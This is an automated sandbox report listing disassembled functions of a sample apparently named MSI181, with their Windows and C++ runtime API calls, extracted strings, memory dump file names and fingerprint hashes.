Part of subcall function 005836D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00583735
Part of subcall function 005836D0: _wcschr.LIBVCRUNTIME ref: 005837C6

GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00583CA8
ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00583D01
ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00583D7A
ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00583EB1
GetLastError.KERNEL32 ref: 00583F34
FreeLibrary.KERNEL32(?), ref: 00583F7B

Strings

1], xrefs: 00583F6C
NtQueryInformationProcess, xrefs: 00583CA2

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
String ID: NtQueryInformationProcess$1]
API String ID: 566592816-1803220124
Opcode ID: b6a0e0bd0e39f2c67649a7e1c62152d401f278f79c1b0cb2fcc130f488db576a
Instruction ID: 5295d19a17611fcc9c7b5560c064a6d6383aedc582d33d0ad594b5587c19d770
Opcode Fuzzy Hash: b6a0e0bd0e39f2c67649a7e1c62152d401f278f79c1b0cb2fcc130f488db576a
Instruction Fuzzy Hash: 60A15A70905649DEDB20DF64CC49BAEBBF4BF48704F20459DD449B7280E7B96A88CF91

Uniqueness

Uniqueness Score: -1.00%

Function 005A3F20 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 005A3F57
___except_validate_context_record.LIBVCRUNTIME ref: 005A3F5F
_ValidateLocalCookies.LIBCMT ref: 005A3FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 005A4013
_ValidateLocalCookies.LIBCMT ref: 005A4068

Strings

2Z, xrefs: 005A402C
TGZ, xrefs: 005A4005, 005A400E, 005A401F
csm, xrefs: 005A3FFD

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: 2Z$TGZ$csm
API String ID: 1170836740-4241829267
Opcode ID: fd81e13ca60de9380f8182a0aa656a965f724eee9bae65a3a09a543b5b64a8b1
Instruction ID: d34d44860a424c526f0b3c2c3e1e033718be448d4f52b04c1017d01a1c4659aa
Opcode Fuzzy Hash: fd81e13ca60de9380f8182a0aa656a965f724eee9bae65a3a09a543b5b64a8b1
Instruction Fuzzy Hash: B6418134E102099FCF10DF68C889A9EBFB5BF86328F148456F9159B392D775AE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00598555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0059855C
_Maklocstr.LIBCPMT ref: 005985C5
_Maklocstr.LIBCPMT ref: 005985D7
_Maklocchr.LIBCPMT ref: 005985EF
_Maklocchr.LIBCPMT ref: 005985FF
_Getvals.LIBCPMT ref: 00598621

Part of subcall function 00591CD4: _Maklocchr.LIBCPMT ref: 00591D03
Part of subcall function 00591CD4: _Maklocchr.LIBCPMT ref: 00591D19

Strings

true, xrefs: 005985D2
false, xrefs: 005985C0

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 3549167292-2658103896
Opcode ID: 7b765526f25295b88295d4f1f36996f65d6c3a2813e6949cfc34726343da949e
Instruction ID: 20882cf7f2494150cc63e5dff4346830e70c30b65b9da89ce71d96aa75311f14
Opcode Fuzzy Hash: 7b765526f25295b88295d4f1f36996f65d6c3a2813e6949cfc34726343da949e
Instruction Fuzzy Hash: 7E219FB1D00315AADF15EFA5D88AADE7FA8BF45310F04805AB9049F242EA708A40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00589730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 00589763

Part of subcall function 00590C94: __EH_prolog3.LIBCMT ref: 00590C9B
Part of subcall function 00590C94: std::_Lockit::_Lockit.LIBCPMT ref: 00590CA6
Part of subcall function 00590C94: std::locale::_Setgloballocale.LIBCPMT ref: 00590CC1
Part of subcall function 00590C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00590D17

std::_Lockit::_Lockit.LIBCPMT ref: 0058978A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005897F0
std::locale::_Locimp::_Makeloc.LIBCPMT ref: 0058984A

Part of subcall function 0058F57A: __EH_prolog3.LIBCMT ref: 0058F581

LocalFree.KERNEL32(00000000,00000000,?,005D54B1,00000000), ref: 005899BF
__cftoe.LIBCMT ref: 00589B0B

Strings

bad locale name, xrefs: 005898FF

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockitstd::locale::_$H_prolog3Lockit::_$FreeInitLocalLocimp::_Locinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
String ID: bad locale name
API String ID: 3578231455-1405518554
Opcode ID: aeb211751936a327cc080c6d4fe9f86e081844862b181b59fd5346e22e8f0455
Instruction ID: 39ac6a60e83272c86b25143807dcf19c4af2bb39540e6c057ac990a5a52d34c0
Opcode Fuzzy Hash: aeb211751936a327cc080c6d4fe9f86e081844862b181b59fd5346e22e8f0455
Instruction Fuzzy Hash: 6DF19B71901249DFDF14DFA8C985BAEBFB5FF49304F284169E805BB281E7359A04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005B72FB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,005B7632,00000021,FlsSetValue,005CBD58,005CBD60,?,?,005B5955,00000006,000000FF,?,005A6CE7,00000000,A8[), ref: 005B73BC

Strings

api-ms-, xrefs: 005B7352
A8[, xrefs: 005B72FD
ext-ms-, xrefs: 005B7366

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: FreeLibrary
String ID: A8[$api-ms-$ext-ms-
API String ID: 3664257935-4011591793
Opcode ID: 8a43ceab68a3290d820db8bed62e8b962c0f4a93fa2e86ada20660db6a3e9f6c
Instruction ID: a509abee6e8cb2860b8f7d98ebc79b172a7e9d46e8cb6fc64d586f7fa1f256dd
Opcode Fuzzy Hash: 8a43ceab68a3290d820db8bed62e8b962c0f4a93fa2e86ada20660db6a3e9f6c
Instruction Fuzzy Hash: 2F210531A09619ABDB219B659C45EAE3FD8FFDA760F240911ED12A7280D730FD00EA90

Uniqueness

Uniqueness Score: -1.00%

Function 005840B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,40000022,F302A5AA,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00584154
LocalAlloc.KERNEL32(00000040,3FFFFFFF,F302A5AA,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00584177
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00584217
OpenProcess.KERNEL32(00000400,00000000,?,F302A5AA,?,?,?), ref: 005842D2
OpenProcess.KERNEL32(00000400,00000000,?,?,F302A5AA,?,?,?), ref: 005842F3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F302A5AA,?,?,?), ref: 00584326
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F302A5AA,?,?,?), ref: 00584337
CloseHandle.KERNEL32(00000000,?,F302A5AA,?,?,?), ref: 00584355
CloseHandle.KERNEL32(00000000,?,F302A5AA,?,?,?), ref: 00584371

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Process$Local$AllocCloseHandleOpenTimes$Free
String ID:
API String ID: 1424318461-0
Opcode ID: 8223642be4b094fc559acabe7e32bfb813544218b34e44b3e7de996dd8633978
Instruction ID: bb857d9b7be851beac43a26fe7f0385abc30b27cf4e262441ab6d358533f56e8
Opcode Fuzzy Hash: 8223642be4b094fc559acabe7e32bfb813544218b34e44b3e7de996dd8633978
Instruction Fuzzy Hash: 6F81A275A0060A9FDB14DFA8D885BAEBFB5FB48310F244629ED25B7390D770A944CF90

Uniqueness

Uniqueness Score: -1.00%

Function 005A266D Relevance: 12.2, APIs: 8, Instructions: 224COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 005A26F8
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005A2786
__alloca_probe_16.LIBCMT ref: 005A27B0
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005A27F8
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005A2812
__alloca_probe_16.LIBCMT ref: 005A2838
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005A2875
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 005A2892

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
String ID:
API String ID: 3603178046-0
Opcode ID: 38d559ea2e892311e12126cd92f01079847d16738fe5a43fe0e5f490488cb651
Instruction ID: 71b45962cae9122de721e9aa75b2e7e62fda37fc70bcf7db388f947c0aedc7fa
Opcode Fuzzy Hash: 38d559ea2e892311e12126cd92f01079847d16738fe5a43fe0e5f490488cb651
Instruction Fuzzy Hash: E0716E7690020AAFDF219FA8CC46AEE7FB6FF4A750F290019F904A7151DB358905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 005A215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 005A21A3
__alloca_probe_16.LIBCMT ref: 005A21CF
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 005A220E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005A222B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 005A226A
__alloca_probe_16.LIBCMT ref: 005A2287
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005A22C9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 005A22EC

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 418e6b5ce3dac4be3d0f765de34720801a710681b69b01d2d6fec253946ced62
Instruction ID: 7cce4c9ee8f87711e47686c2408dc4bfac410ab141f76eff4ca11971551bc289
Opcode Fuzzy Hash: 418e6b5ce3dac4be3d0f765de34720801a710681b69b01d2d6fec253946ced62
Instruction Fuzzy Hash: A951BD7250020AAFEF208F68CC4AFAF7FA9FF46740F154429FA15A6150D7349D10DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00588610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00588657
std::_Lockit::_Lockit.LIBCPMT ref: 00588679
std::_Lockit::~_Lockit.LIBCPMT ref: 005886A1
LocalAlloc.KERNEL32(00000040,00000044,00000000,F302A5AA,?,00000000), ref: 005886F9
__Getctype.LIBCPMT ref: 0058877B
std::_Facet_Register.LIBCPMT ref: 005887E4
std::_Lockit::~_Lockit.LIBCPMT ref: 0058880E

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
String ID:
API String ID: 2372200979-0
Opcode ID: 43397d9fe65090b205f707086c9e051f5c0deb5be8af5edadd670398e7ec61e9
Instruction ID: fcd806f1d996d84bb29451a72fd58fd35152f5d4b6cefd10d9cd3c0426f59dc5
Opcode Fuzzy Hash: 43397d9fe65090b205f707086c9e051f5c0deb5be8af5edadd670398e7ec61e9
Instruction Fuzzy Hash: 6461C271D00645CFDB21DF68C944BAABFF4FF24314F14459AD845AB392EB31AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00589270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 005892A0
std::_Lockit::_Lockit.LIBCPMT ref: 005892C2
std::_Lockit::~_Lockit.LIBCPMT ref: 005892EA
LocalAlloc.KERNEL32(00000040,00000018,00000000,F302A5AA,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00589342
__Getctype.LIBCPMT ref: 005893BD
std::_Facet_Register.LIBCPMT ref: 005893F8
std::_Lockit::~_Lockit.LIBCPMT ref: 00589422

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
String ID:
API String ID: 2372200979-0
Opcode ID: f70f619b6515bc683b5e2a24e12ce2037d3d7a9a6d454d94bcbfe3d7518fdc8c
Instruction ID: 8b6000629cf9ef0a4b343969ea3c8427ea337fc0686f296819b208ff0b0dd096
Opcode Fuzzy Hash: f70f619b6515bc683b5e2a24e12ce2037d3d7a9a6d454d94bcbfe3d7518fdc8c
Instruction Fuzzy Hash: 9E51B070905209DFCB21EF58C844BAEBFF4FF54714F18895AE846AB391DB70AA05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00586FB0 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 77COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00586FB7

Strings

<S], xrefs: 0058706C
Call to ShellExecute() for verb<, xrefs: 00586FC1
<S], xrefs: 00587031
Last error=, xrefs: 00587011
<S], xrefs: 00586FF0
> returned:, xrefs: 00586FC6

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ErrorLast
String ID: <S]$<S]$<S]$> returned:$Call to ShellExecute() for verb<$Last error=
API String ID: 1452528299-1944878284
Opcode ID: 65b428ea3794cfc93b9a7d306273c7a49b34772a962e597d445ff1d0e808c749
Instruction ID: d2e06b1b3d5ac7b8130e391a37ca209e28ec3daafde9c1b5c546140f5166d16e
Opcode Fuzzy Hash: 65b428ea3794cfc93b9a7d306273c7a49b34772a962e597d445ff1d0e808c749
Instruction Fuzzy Hash: F5219249B10222C7CB302F2C8405339AAE0FF58755F64086FDDC9E7390FA69CC828395

Uniqueness

Uniqueness Score: -1.00%

Function 0058D87C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058D883
std::_Lockit::_Lockit.LIBCPMT ref: 0058D88D

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

numpunct.LIBCPMT ref: 0058D8C7
std::_Facet_Register.LIBCPMT ref: 0058D8DE
std::_Lockit::~_Lockit.LIBCPMT ref: 0058D8FE

Strings

2Z, xrefs: 0058D8EB

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID: 2Z
API String ID: 743221004-2484645983
Opcode ID: b78c39ebb86adf69a1677850f7bc4138262c92aa5e18430d40823ecd2adaa7be
Instruction ID: 0888aa7269afeaa862d8dbc09b70e6ba6debe416892942763782d8595f7b86e3
Opcode Fuzzy Hash: b78c39ebb86adf69a1677850f7bc4138262c92aa5e18430d40823ecd2adaa7be
Instruction Fuzzy Hash: E3115E3590021A9FCB14FBA49859ABEBBB1BFD4710F24085AE8117B2D1DF749E058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0059238F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592396
std::_Lockit::_Lockit.LIBCPMT ref: 005923A0

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

codecvt.LIBCPMT ref: 005923DA
std::_Facet_Register.LIBCPMT ref: 005923F1
std::_Lockit::~_Lockit.LIBCPMT ref: 00592411

Strings

2Z, xrefs: 005923FE

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: 2Z
API String ID: 712880209-2484645983
Opcode ID: 5302fa3fec9cdbafc143b5dd78f4ac8d07fdb1b79de365f97c0f57856a5f553a
Instruction ID: a7754d195aa97d019186d1a89fe0af200bbcbe9093365b96efad5a812243afff
Opcode Fuzzy Hash: 5302fa3fec9cdbafc143b5dd78f4ac8d07fdb1b79de365f97c0f57856a5f553a
Instruction Fuzzy Hash: 3B01AD3590111A9FCF10ABA49849ABE7FB5BFD4720F24081AF4117B291DF749E45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00592424 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059242B
std::_Lockit::_Lockit.LIBCPMT ref: 00592435

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

collate.LIBCPMT ref: 0059246F
std::_Facet_Register.LIBCPMT ref: 00592486
std::_Lockit::~_Lockit.LIBCPMT ref: 005924A6

Strings

2Z, xrefs: 00592493

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID: 2Z
API String ID: 1007100420-2484645983
Opcode ID: 9345d85bb3c70345c2d9e744f92a8d97b7128308716c627a2cc93e3893fd1b53
Instruction ID: c0d8d4ac0a8c1cf2e9fea8e715856677f150a03fb8b4be7e6f1f1dbe0acf4303
Opcode Fuzzy Hash: 9345d85bb3c70345c2d9e744f92a8d97b7128308716c627a2cc93e3893fd1b53
Instruction Fuzzy Hash: CC018B3590111AAFCF10ABA4D819ABE7FA5BF84720F24080AE4046B2D1DF749E04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005924B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005924C0
std::_Lockit::_Lockit.LIBCPMT ref: 005924CA

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

collate.LIBCPMT ref: 00592504
std::_Facet_Register.LIBCPMT ref: 0059251B
std::_Lockit::~_Lockit.LIBCPMT ref: 0059253B

Strings

2Z, xrefs: 00592528

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID: 2Z
API String ID: 1007100420-2484645983
Opcode ID: b9b15ce55fbaebf96e131afd4a06fb7b6510dda5294b3e11bddd176248869013
Instruction ID: b5dc1cb56774460496311e76e7522c67fa37e779b646a20a7d2210262877bdaf
Opcode Fuzzy Hash: b9b15ce55fbaebf96e131afd4a06fb7b6510dda5294b3e11bddd176248869013
Instruction Fuzzy Hash: 0301AD3590111AEFCF15EBA49859ABEBFB1BFD4720F25080AF8106B291CF309E059B90

Uniqueness

Uniqueness Score: -1.00%

Function 0059254E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592555
std::_Lockit::_Lockit.LIBCPMT ref: 0059255F

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

ctype.LIBCPMT ref: 00592599
std::_Facet_Register.LIBCPMT ref: 005925B0
std::_Lockit::~_Lockit.LIBCPMT ref: 005925D0

Strings

2Z, xrefs: 005925BD

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
